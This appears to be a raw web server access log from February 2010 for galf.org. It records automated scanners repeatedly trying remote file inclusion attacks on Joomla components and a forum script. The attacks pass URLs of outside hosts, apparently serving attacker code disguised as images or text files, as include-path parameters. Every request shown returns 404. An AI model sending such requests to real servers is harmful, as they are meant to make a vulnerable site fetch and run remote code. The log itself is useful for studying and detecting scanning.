218.38.136.125 - - [07/Feb/2010:16:06:46 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:06:46 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:48 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:48 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:48 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:06:49 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:50 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:50 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:50 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:50 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:50 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:50 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:06:51 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:52 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:06:53 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:53 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:06:54 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:06:54 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:54 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:55 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [07/Feb/2010:16:06:55 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:06:57 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:06:58 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:06:58 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:00 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:00 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:01 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:07:02 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:03 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:03 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:04 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:04 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:05 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:07:06 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:07:06 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:08 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:08 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:09 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:10 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:07:11 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:16 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:16 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:20 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:22 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:16:07:23 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [07/Feb/2010:16:07:23 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [07/Feb/2010:16:07:23 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
69.163.202.84 - - [07/Feb/2010:16:07:23 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:07:23 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.115.213.229 - - [07/Feb/2010:16:07:23 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.115.213.229 - - [07/Feb/2010:16:07:23 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:25 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:07:28 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:16:07:29 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [07/Feb/2010:16:07:29 -0800] "GET /logs/access_100201.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:33 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:07:41 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:46 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:47 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:54 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:55 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:07:59 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:04 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:06 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:08 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:11 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:13 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:18 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:19 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:22 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:27 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:08:51 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:16:09:16 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:16:09:17 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [07/Feb/2010:16:09:17 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [07/Feb/2010:16:09:17 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [07/Feb/2010:16:09:20 -0800] "GET /logs/access_100201.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [07/Feb/2010:16:09:20 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:09:56 -0800] "GET /logs/access_090720.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:12 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:28 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:32 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:10:33 -0800] "GET /logs/access_100201.log%20%20///bbs/delete_all.php?board_skin_path=http://www.fileden.com/files/2010/2/6/2751992/ld1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:35 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:35 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:44 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:46 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:47 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:47 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:47 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:50 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.78.109.87 - - [07/Feb/2010:16:10:50 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.78.109.87 - - [07/Feb/2010:16:10:50 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:51 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.78.109.87 - - [07/Feb/2010:16:10:52 -0800] "GET /logs/access_090803.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:53 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:55 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:10:55 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:10:55 -0800] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:10:55 -0800] "GET /logs/access_091123.log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:10:57 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:00 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:06 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:09 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:09 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:18 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:18 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:19 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:20 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:23 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:23 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:23 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:11:27 -0800] "GET /logs/access_091123.log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:11:28 -0800] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:32 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:32 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:32 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:11:33 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
